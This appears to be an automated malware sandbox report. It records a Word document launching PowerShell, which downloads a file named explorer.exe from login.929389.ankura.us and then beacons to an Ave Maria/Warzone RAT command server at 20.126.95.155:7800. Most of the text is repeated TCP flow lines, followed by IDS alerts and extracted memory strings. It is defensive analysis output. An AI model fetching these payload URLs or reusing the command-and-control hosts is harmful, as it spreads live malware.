Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic DNS query: name: login.929389.ankura.us
Source: global traffic DNS query: name: login.929389.ankura.us
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 159.223.2.212:80

Networking

barindex
Source: Traffic Snort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Malware configuration extractor URLs: 20.126.95.155
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View ASN Name: CELANESE-US CELANESE-US
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 20.126.95.155:7800
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ank
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/Aw
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exePE
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.926952704.000000001B39C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: login.929389.ankura.us
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
